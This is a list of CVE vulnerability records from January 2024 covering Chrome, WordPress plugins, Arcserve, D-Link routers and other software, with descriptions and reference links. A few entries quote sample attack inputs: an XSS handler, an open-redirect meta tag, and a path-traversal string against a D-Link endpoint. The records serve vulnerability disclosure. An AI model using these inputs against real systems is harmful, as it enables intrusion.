CVE    2024    813    Candidate    Use after free in Reading Mode in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium)    FEDORA:FEDORA-2024-3f7345570a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/   |   FEDORA:FEDORA-2024-e42978d12c   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   MISC:https://crbug.com/1477151   |   URL:https://crbug.com/1477151    Assigned (20240123)
CVE    2024    812    Candidate    Inappropriate implementation in Accessibility in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-3f7345570a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/   |   FEDORA:FEDORA-2024-e42978d12c   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   MISC:https://crbug.com/1484394   |   URL:https://crbug.com/1484394    Assigned (20240123)
CVE    2024    811    Candidate    Inappropriate implementation in Extensions API in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Low)    FEDORA:FEDORA-2024-3f7345570a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/   |   FEDORA:FEDORA-2024-e42978d12c   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/   |   MISC:http://packetstormsecurity.com/files/177172/Chrome-chrome.pageCapture.saveAsMHTML-Extension-API-Blocked-Origin-Bypass.html   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   MISC:https://crbug.com/1494490   |   URL:https://crbug.com/1494490    Assigned (20240123)
CVE    2024    810    Candidate    Insufficient policy enforcement in DevTools in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Medium)    FEDORA:FEDORA-2024-3f7345570a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/   |   FEDORA:FEDORA-2024-e42978d12c   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   MISC:https://crbug.com/1496250   |   URL:https://crbug.com/1496250    Assigned (20240123)
CVE    2024    809    Candidate    Inappropriate implementation in Autofill in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to bypass Autofill restrictions via a crafted HTML page. (Chromium security severity: Low)    FEDORA:FEDORA-2024-3f7345570a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/   |   FEDORA:FEDORA-2024-e42978d12c   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   MISC:https://crbug.com/1497985   |   URL:https://crbug.com/1497985    Assigned (20240123)
CVE    2024    808    Candidate    Integer underflow in WebUI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a malicious file. (Chromium security severity: High)    FEDORA:FEDORA-2024-3f7345570a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/   |   FEDORA:FEDORA-2024-e42978d12c   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   MISC:https://crbug.com/1504936   |   URL:https://crbug.com/1504936    Assigned (20240123)
CVE    2024    807    Candidate    Use after free in Web Audio in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-3f7345570a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/   |   FEDORA:FEDORA-2024-e42978d12c   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   MISC:https://crbug.com/1505080   |   URL:https://crbug.com/1505080    Assigned (20240123)
CVE    2024    806    Candidate    Use after free in Passwords in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium)    FEDORA:FEDORA-2024-3f7345570a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/   |   FEDORA:FEDORA-2024-e42978d12c   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   MISC:https://crbug.com/1505176   |   URL:https://crbug.com/1505176    Assigned (20240123)
CVE    2024    805    Candidate    Inappropriate implementation in Downloads in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Medium)    FEDORA:FEDORA-2024-3f7345570a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/   |   FEDORA:FEDORA-2024-e42978d12c   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   MISC:https://crbug.com/1514925   |   URL:https://crbug.com/1514925    Assigned (20240123)
CVE    2024    804    Candidate    Insufficient policy enforcement in iOS Security UI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)    FEDORA:FEDORA-2024-3f7345570a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/   |   FEDORA:FEDORA-2024-e42978d12c   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html   |   MISC:https://crbug.com/1515137   |   URL:https://crbug.com/1515137    Assigned (20240123)
CVE    2024    802    Candidate    Incorrect Pointer Scaling vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to read arbitrary information from a target product or execute malicious code on a target product by sending a specially crafted packet.    MISC:https://jvn.jp/vu/JVNVU99690199/   |   URL:https://jvn.jp/vu/JVNVU99690199/   |   MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14   |   MISC:https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf   |   URL:https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf    Assigned (20240123)
CVE    2024    801    Candidate    A denial of service vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in ASNative.dll.    MISC:https://www.tenable.com/security/research/tra-2024-07   |   URL:https://www.tenable.com/security/research/tra-2024-07    Assigned (20240122)
CVE    2024    800    Candidate    A path traversal vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.servlet.ImportNodeServlet.    MISC:https://www.tenable.com/security/research/tra-2024-07   |   URL:https://www.tenable.com/security/research/tra-2024-07    Assigned (20240122)
CVE    2024    799    Candidate    An authentication bypass vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in the edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.EdgeLoginServiceImpl.doLogin() function within wizardLogin.    MISC:https://www.tenable.com/security/research/tra-2024-07   |   URL:https://www.tenable.com/security/research/tra-2024-07    Assigned (20240122)
CVE    2024    798    Candidate    A user with a `default` role given to them by the admin can send `DELETE` HTTP requests to `remove-folder` and `remove-document` to delete folders and source files from the instance even when their role should explicitly not allow this action on the system.    MISC:https://github.com/mintplex-labs/anything-llm/commit/d5cde8b7c27a47ab45b05b441db16751537f1733   |   URL:https://github.com/mintplex-labs/anything-llm/commit/d5cde8b7c27a47ab45b05b441db16751537f1733   |   MISC:https://huntr.com/bounties/607f03a0-ab4d-4905-b253-3d28bbbd363c   |   URL:https://huntr.com/bounties/607f03a0-ab4d-4905-b253-3d28bbbd363c    Assigned (20240122)
CVE    2024    797    Candidate    The Active Products Tables for WooCommerce. Professional products tables for WooCommerce store plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including, 1.0.6.1. This makes it possible for subscribers and higher to execute functions intended for admin use.    MISC:https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk   |   URL:https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0a94841f-b1dd-44f4-b7a1-65a9fdf7b18d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0a94841f-b1dd-44f4-b7a1-65a9fdf7b18d?source=cve    Assigned (20240122)
CVE    2024    796    Candidate    The Active Products Tables for WooCommerce. Professional products tables for WooCommerce store plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.6.1. This is due to missing or incorrect nonce validation on several functions corresponding to AJAX actions. This makes it possible for unauthenticated attackers to invoke those functions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk   |   URL:https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5069fbc4-b3c4-4c0b-892c-2c83f35dc2fe?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5069fbc4-b3c4-4c0b-892c-2c83f35dc2fe?source=cve    Assigned (20240122)
CVE    2024    795    Candidate    If an attacker was given access to an instance with the admin or manager role there is no backend authentication that would prevent the attacker from creating a new user with an `admin` role and then be able to use this new account to have elevated privileges on the instance    MISC:https://github.com/mintplex-labs/anything-llm/commit/9a237db3d1f66cdbcf5079599258f5fb251c5564   |   URL:https://github.com/mintplex-labs/anything-llm/commit/9a237db3d1f66cdbcf5079599258f5fb251c5564   |   MISC:https://huntr.com/bounties/f69e3307-7b44-4776-ac60-2990990723ec   |   URL:https://huntr.com/bounties/f69e3307-7b44-4776-ac60-2990990723ec    Assigned (20240122)
CVE    2024    794    Candidate    Certain HP LaserJet Pro, HP Enterprise LaserJet, and HP LaserJet Managed Printers are potentially vulnerable to Remote Code Execution due to buffer overflow when rendering fonts embedded in a PDF file.    MISC:https://support.hp.com/us-en/document/ish_10174031-10198670-16   |   URL:https://support.hp.com/us-en/document/ish_10174031-10198670-16    Assigned (20240122)
CVE    2024    792    Candidate    The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 7.0.1 due to insufficient input sanitization and output escaping on RSS feed content. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/shortcodes/feed.php#L49   |   URL:https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/shortcodes/feed.php#L49   |   MISC:https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/shortcodes/feed.php#L78   |   URL:https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/shortcodes/feed.php#L78   |   MISC:https://plugins.trac.wordpress.org/changeset/3026377/   |   URL:https://plugins.trac.wordpress.org/changeset/3026377/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0d8c043c-e347-4dc8-8a72-943a7e6c4394?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0d8c043c-e347-4dc8-8a72-943a7e6c4394?source=cve    Assigned (20240122)
CVE    2024    791    Candidate    The WOLF – WordPress Posts Bulk Editor and Manager Professional plugin for WordPress is vulnerable to unauthorized access, modification or loss of data due to a missing capability check on the wpbe_create_new_term, wpbe_update_tax_term, and wpbe_delete_tax_term functions in all versions up to, and including, 1.0.8.1. This makes it possible for authenticated attackers, with subscriber access or higher, to create, delete or modify taxonomy terms.    MISC:https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php   |   URL:https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/13c66a8f-b35f-4943-8880-0799b0d150f7?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/13c66a8f-b35f-4943-8880-0799b0d150f7?source=cve    Assigned (20240122)
CVE    2024    790    Candidate    The WOLF – WordPress Posts Bulk Editor and Manager Professional plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.8.1. This is due to missing or incorrect nonce validation on the wpbe_create_new_term, wpbe_update_tax_term, and wpbe_delete_tax_term functions. This makes it possible for unauthenticated attackers to create, modify and delete taxonomy terms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Furthermore, the functions wpbe_save_options, wpbe_bulk_delete_posts_count, wpbe_bulk_delete_posts, and wpbe_save_meta are vulnerable to Cross-Site Request Forgery allowing for plugin options update, post count deletion, post deletion and modification of post metadata via forged request.    MISC:https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php   |   URL:https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6c48f94b-d193-429a-9383-628ae12bfdf3?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6c48f94b-d193-429a-9383-628ae12bfdf3?source=cve    Assigned (20240122)
CVE    2024    788    Candidate    SUPERAntiSpyware Pro X v10.0.1260 is vulnerable to kernel-level API parameters manipulation and Denial of Service vulnerabilities by triggering the 0x9C402140 IOCTL code of the saskutil64.sys driver.    MISC:https://fluidattacks.com/advisories/brubeck/   |   URL:https://fluidattacks.com/advisories/brubeck/   |   MISC:https://www.superantispyware.com/professional-x-edition.html   |   URL:https://www.superantispyware.com/professional-x-edition.html    Assigned (20240122)
CVE    2024    786    Candidate    The Conversios – Google Analytics 4 (GA4), Meta Pixel & more Via Google Tag Manager For WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the ee_syncProductCategory function using the parameters conditionData, valueData, productArray, exclude and include in all versions up to, and including, 6.9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/browser/enhanced-e-commerce-for-woocommerce-store/trunk/includes/data/class-tvc-ajax-file.php#L1979   |   URL:https://plugins.trac.wordpress.org/browser/enhanced-e-commerce-for-woocommerce-store/trunk/includes/data/class-tvc-ajax-file.php#L1979   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c30801d1-9335-4bba-b344-f0ff57cecf84?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c30801d1-9335-4bba-b344-f0ff57cecf84?source=cve    Assigned (20240122)
CVE    2024    784    Candidate    A vulnerability was found in hongmaple octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/role/list. The manipulation of the argument dataScope leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. The identifier of this vulnerability is VDB-251700.    MISC:https://github.com/biantaibao/octopus_SQL/blob/main/report.md   |   URL:https://github.com/biantaibao/octopus_SQL/blob/main/report.md   |   MISC:https://vuldb.com/?ctiid.251700   |   URL:https://vuldb.com/?ctiid.251700   |   MISC:https://vuldb.com/?id.251700   |   URL:https://vuldb.com/?id.251700    Assigned (20240122)
CVE    2024    783    Candidate    A vulnerability was found in Project Worlds Online Admission System 1.0 and classified as critical. This issue affects some unknown processing of the file documents.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251699.    MISC:https://github.com/keru6k/Online-Admission-System-RCE-PoC   |   URL:https://github.com/keru6k/Online-Admission-System-RCE-PoC   |   MISC:https://github.com/keru6k/Online-Admission-System-RCE-PoC/blob/main/poc.py   |   URL:https://github.com/keru6k/Online-Admission-System-RCE-PoC/blob/main/poc.py   |   MISC:https://vuldb.com/?ctiid.251699   |   URL:https://vuldb.com/?ctiid.251699   |   MISC:https://vuldb.com/?id.251699   |   URL:https://vuldb.com/?id.251699    Assigned (20240122)
CVE    2024    782    Candidate    A vulnerability has been found in CodeAstro Online Railway Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file pass-profile.php. The manipulation of the argument First Name/Last Name/User Name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251698 is the identifier assigned to this vulnerability.    MISC:https://drive.google.com/drive/folders/1ecVTReqCS_G8svyq3MG79E2y59psMcPn?usp=sharing   |   URL:https://drive.google.com/drive/folders/1ecVTReqCS_G8svyq3MG79E2y59psMcPn?usp=sharing   |   MISC:https://vuldb.com/?ctiid.251698   |   URL:https://vuldb.com/?ctiid.251698   |   MISC:https://vuldb.com/?id.251698   |   URL:https://vuldb.com/?id.251698    Assigned (20240122)
CVE    2024    781    Candidate    A vulnerability, which was classified as problematic, was found in CodeAstro Internet Banking System 1.0. This affects an unknown part of the file pages_client_signup.php. The manipulation of the argument Client Full Name with the input <meta http-equiv="refresh" content="0; url=https://vuldb.com" /> leads to open redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251697 was assigned to this vulnerability.    MISC:https://drive.google.com/drive/folders/1f61RXqelSDY0T92aLjmb8BhgAHt_eeUS   |   URL:https://drive.google.com/drive/folders/1f61RXqelSDY0T92aLjmb8BhgAHt_eeUS   |   MISC:https://vuldb.com/?ctiid.251697   |   URL:https://vuldb.com/?ctiid.251697   |   MISC:https://vuldb.com/?id.251697   |   URL:https://vuldb.com/?id.251697    Assigned (20240122)
CVE    2024    780    Candidate    The Enjoy Social Feed plugin for WordPress website WordPress plugin through 6.2.2 does not have authorisation when resetting its database, allowing any authenticated users, such as subscriber to perform such action    MISC:https://wpscan.com/vulnerability/be3045b1-72e6-450a-8dd2-4702a9328447/   |   URL:https://wpscan.com/vulnerability/be3045b1-72e6-450a-8dd2-4702a9328447/    Assigned (20240122)
CVE    2024    779    Candidate    The Enjoy Social Feed plugin for WordPress website WordPress plugin through 6.2.2 does not have authorisation and CSRF in various function hooked to admin_init, allowing unauthenticated users to call them and unlink arbitrary users Instagram Account for example    MISC:https://wpscan.com/vulnerability/ced134cf-82c5-401b-9476-b6456e1924e2/   |   URL:https://wpscan.com/vulnerability/ced134cf-82c5-401b-9476-b6456e1924e2/    Assigned (20240122)
CVE    2024    778    Candidate    ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in Uniview ISC 2500-S up to 20210930. Affected by this issue is the function setNatConfig of the file /Interface/DevManage/VM.php. The manipulation of the argument natAddress/natPort/natServerPort leads to os command injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251696. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.    MISC:https://github.com/dezhoutorizhao/cve/blob/main/rce.md   |   URL:https://github.com/dezhoutorizhao/cve/blob/main/rce.md   |   MISC:https://vuldb.com/?ctiid.251696   |   URL:https://vuldb.com/?ctiid.251696   |   MISC:https://vuldb.com/?id.251696   |   URL:https://vuldb.com/?id.251696    Assigned (20240122)
CVE    2024    776    Candidate    A vulnerability, which was classified as problematic, has been found in LinZhaoguan pb-cms 2.0. Affected by this issue is some unknown functionality of the component Comment Handler. The manipulation with the input <div onmouseenter="alert("xss)"> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251678 is the identifier assigned to this vulnerability.    MISC:https://github.com/sweatxi/BugHub/blob/main/Pbcms%20Background%20recovery%20store%20xss.pdf   |   URL:https://github.com/sweatxi/BugHub/blob/main/Pbcms%20Background%20recovery%20store%20xss.pdf   |   MISC:https://vuldb.com/?ctiid.251678   |   URL:https://vuldb.com/?ctiid.251678   |   MISC:https://vuldb.com/?id.251678   |   URL:https://vuldb.com/?id.251678    Assigned (20240121)
CVE    2024    775    Candidate    A use-after-free flaw was found in the __ext4_remount in fs/ext4/super.c in ext4 in the Linux kernel. This flaw allows a local user to cause an information leak problem while freeing the old quota file names before a potential failure, leading to a use-after-free.    MISC:RHBZ#2259414   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2259414   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0775   |   URL:https://access.redhat.com/security/cve/CVE-2024-0775   |   MISC:https://scm.linefinity.com/common/linux-stable/commit/4c0b4818b1f636bc96359f7817a2d8bab6370162   |   URL:https://scm.linefinity.com/common/linux-stable/commit/4c0b4818b1f636bc96359f7817a2d8bab6370162    Assigned (20240121)
CVE    2024    774    Candidate    A vulnerability was found in Any-Capture Any Sound Recorder 2.93. It has been declared as problematic. This vulnerability affects unknown code of the component Registration Handler. The manipulation of the argument User Name/Key Code leads to memory corruption. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-251674 is the identifier assigned to this vulnerability.    MISC:https://vuldb.com/?ctiid.251674   |   URL:https://vuldb.com/?ctiid.251674   |   MISC:https://vuldb.com/?id.251674   |   URL:https://vuldb.com/?id.251674   |   MISC:https://youtu.be/f_4eHkISrZg   |   URL:https://youtu.be/f_4eHkISrZg    Assigned (20240121)
CVE    2024    773    Candidate    A vulnerability classified as problematic was found in CodeAstro Internet Banking System 1.0. Affected by this vulnerability is an unknown functionality of the file pages_client_signup.php. The manipulation of the argument Client Full Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251677 was assigned to this vulnerability.    MISC:https://drive.google.com/drive/folders/1YjJFvxis3gLWX95990Y-nJMbWCQHB02U?usp=sharing   |   URL:https://drive.google.com/drive/folders/1YjJFvxis3gLWX95990Y-nJMbWCQHB02U?usp=sharing   |   MISC:https://vuldb.com/?ctiid.251677   |   URL:https://vuldb.com/?ctiid.251677   |   MISC:https://vuldb.com/?id.251677   |   URL:https://vuldb.com/?id.251677    Assigned (20240121)
CVE    2024    772    Candidate    A vulnerability was found in Nsasoft ShareAlarmPro 2.1.4 and classified as problematic. Affected by this issue is some unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251672. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://vuldb.com/?ctiid.251672   |   URL:https://vuldb.com/?ctiid.251672   |   MISC:https://vuldb.com/?id.251672   |   URL:https://vuldb.com/?id.251672   |   MISC:https://youtu.be/WIeWeuXbkiY   |   URL:https://youtu.be/WIeWeuXbkiY    Assigned (20240121)
CVE    2024    771    Candidate    A vulnerability has been found in Nsasoft Product Key Explorer 4.0.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251671. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://vuldb.com/?ctiid.251671   |   URL:https://vuldb.com/?ctiid.251671   |   MISC:https://vuldb.com/?id.251671   |   URL:https://vuldb.com/?id.251671   |   MISC:https://youtu.be/eecN5mC0avU   |   URL:https://youtu.be/eecN5mC0avU    Assigned (20240121)
CVE    2024    770    Candidate    A vulnerability, which was classified as critical, was found in European Chemicals Agency IUCLID 7.10.3 on Windows. Affected is an unknown function of the file iuclid6.exe of the component Desktop Installer. The manipulation leads to incorrect default permissions. The attack needs to be approached locally. VDB-251670 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://imagebin.ca/v/7nx8zv3l62Kf   |   URL:https://imagebin.ca/v/7nx8zv3l62Kf   |   MISC:https://vuldb.com/?ctiid.251670   |   URL:https://vuldb.com/?ctiid.251670   |   MISC:https://vuldb.com/?id.251670   |   URL:https://vuldb.com/?id.251670    Assigned (20240121)
CVE    2024    769    Candidate    ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DIR-859 1.06B01. It has been rated as critical. Affected by this issue is some unknown functionality of the file /hedwig.cgi of the component HTTP POST Request Handler. The manipulation of the argument service with the input ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251666 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.    MISC:https://github.com/c2dc/cve-reported/blob/main/CVE-2024-0769/CVE-2024-0769.md   |   URL:https://github.com/c2dc/cve-reported/blob/main/CVE-2024-0769/CVE-2024-0769.md   |   MISC:https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10371   |   URL:https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10371   |   MISC:https://vuldb.com/?ctiid.251666   |   URL:https://vuldb.com/?ctiid.251666   |   MISC:https://vuldb.com/?id.251666   |   URL:https://vuldb.com/?id.251666    Assigned (20240120)
